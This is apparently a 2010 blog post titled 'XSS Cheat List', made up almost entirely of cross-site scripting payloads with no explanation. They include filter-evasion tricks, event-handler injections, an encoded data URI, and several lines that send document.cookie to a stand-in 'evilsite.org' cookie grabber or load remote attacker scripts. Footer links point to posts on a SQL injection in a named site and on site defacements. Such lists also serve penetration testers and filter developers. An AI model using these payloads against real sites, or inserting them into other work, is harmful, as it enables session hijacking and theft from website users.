- <script>alert(1);</script>
- <script>alert('XSS');</script>
- <script src="http://www.evilsite.org/cookiegrabber.php"></script>
- <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
- <scr<script>ipt>alert('XSS');</scr</script>ipt>
- <script>alert(String.fromCharCode(88,83,83))</script>
- <img src=foo.png onerror=alert(/xssed/) />
- <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
- <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
- <marquee><script>alert('XSS')</script></marquee>
- <IMG SRC=\"jav	ascript:alert('XSS');\">
- <IMG SRC=\"jav
ascript:alert('XSS');\">
- <IMG SRC=\"jav
ascript:alert('XSS');\">
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- "><script>alert(0)</script>
- <script src=http://yoursite.com/your_files.js></script>
- </title><script>alert(/xss/)</script>
- </textarea><script>alert(/xss/)</script>
- <IMG LOWSRC=\"javascript:alert('XSS')\">
- <IMG DYNSRC=\"javascript:alert('XSS')\">
- <font style='color:expression(alert(document.cookie))'>
- '); alert('XSS
- <img src="javascript:alert('XSS')">
- <script language="JavaScript">alert('XSS')</script>
- [url=javascript:alert('XSS');]click me[/url]
- <body onunload="javascript:alert('XSS');">
- <body onLoad="alert('XSS');"
- [color=red' onmouseover="alert('xss')"]mouse over[/color]
- "/></a></><img src=1.gif onerror=alert(1)>
- window.alert("Bonjour !");
- <div style="x:expression((window.r==1)?'':eval('r=1;
- alert(String.fromCharCode(88,83,83));'))">
- <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
- "><script alert(String.fromCharCode(88,83,83))</script>
- '>><marquee><h1>XSS</h1></marquee>
- '">><script>alert('XSS')</script>
- '">><marquee><h1>XSS</h1></marquee>
- <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
- <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
- <script>var var = 1; alert(var)</script>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
- <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
- <IMG SRC='vbscript:msgbox(\"XSS\")'>
- " onfocus=alert(document.domain) "> <"
- <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
- <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
- perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
- perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
- <br size=\"&{alert('XSS')}\">
- <scrscriptipt>alert(1)</scrscriptipt>
- </br style=a:expression(alert())>
- </script><script>alert(1)</script>
- "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
- [color=red width=expression(alert(123))][color]
- <BASE HREF="javascript:alert('XSS');//">
- Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
- "></iframe><script>alert(123)</script>
- <body onLoad="while(true) alert('XSS');">
- '"></title><script>alert(1111)</script>
- </textarea>'"><script>alert(document.cookie)</script>
- '""><script language="JavaScript"> alert('X \nS \nS');</script>
- </script></script><<<<script><>>>><<<script>alert(123)</script>
- <html><noalert><noscript>(123)</noscript><script>(123)</script>
- <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
- '></select><script>alert(123)</script>
- '>"><script src = 'http://www.site.com/XSS.js'></script>
- }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
- <SCRIPT>document.write("XSS");</SCRIPT>
- a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
- ='><script>alert("xss")</script>
- <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
- <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
- ">/PlanetCreator/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
- ">/PlanetCreator/><script>alert(document.cookie)</script>
- src="http://www.site.com/XSS.js">
- data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
XSS Cheat List
September 4, 2010
0 Comments
Explore More
Tracking Down A BotNet
This will not be very long, nor will I go into excessive amounts of detail into the tools and steps required. The purpose of this paper is simply to help
Critical SQL Injection in Myanmar Calendar
PlanetCreator‘s Security Team Researcher Infofreakzzz reported another Critical SQL injection (vulnerability) on Myanmar Calendar URL : http://www.myanmarcalendar.org/ SQL injection is a code injection technique that exploits a security vulnerability occurring
Several avast sites were defaces
Last month, eight sites at once well-known anti-virus solutions avast! Were defaces: http://www.avast.co.za/ (mirror; date: 2010-01-22 15:06:28) http://awast.org/ (mirror; date: 2010-02-18 18:57:27) http://www.avast.de/ (mirror; date: 2010-02-18 18:58:01) http://shop.avast.de/ (mirror; date: